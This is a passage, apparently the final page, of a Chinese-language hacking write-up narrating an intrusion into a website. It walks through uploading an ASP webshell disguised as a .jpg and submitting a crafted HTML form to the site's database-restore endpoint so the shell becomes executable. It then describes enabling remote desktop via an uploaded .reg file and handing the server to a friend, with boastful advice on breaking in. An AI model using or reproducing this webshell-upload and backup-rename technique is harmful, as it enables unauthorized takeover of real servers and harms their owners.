现在我们向主站进攻，直接登录管理员帐号，做个mdb附加的asp马，再改成.jpg的，上传上去，接下来就是备分了，写了一个本地提交备分的。

<form action="http://www.xxxx.us/admin/data.asp?action=RestoreData&act=Restore" method="post">
<p>upload：<input name="Dbpath" type="text" size="80"></p>
<p>copy to：<input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="send"></p>
</form>
在这里还出现了一点小小的插曲，路径我填的upfiles/xxxx.gif可老是出现不是有效的数据库，最后研究了半天，原来管理员把上传的目录改成了upimages,真够郁闷，折腾了一下终于备份成功，如图：


接下来当然要做就做完了，同样，里面又是装的个serv-u，做事就做到底吧，上传个2003.reg开个3389,还好2003的服务器不用重启，给一个3389给血印同志就玩工了。


尾声：
血印同志看到我给他一个完整的3389服务器感激不尽，一直问我咋个进去的，其实很简单，我们在入侵的过程中寻找突破口很重要，要懂得放弃，在一个有破绽的地方久久没办法突破就想其它的办法。黑客技术是经验和思维的积累，其实很多情况下都没有什么高深复杂的技术，它需要我们的耐心和技巧。

上一页  [1] [2] [3]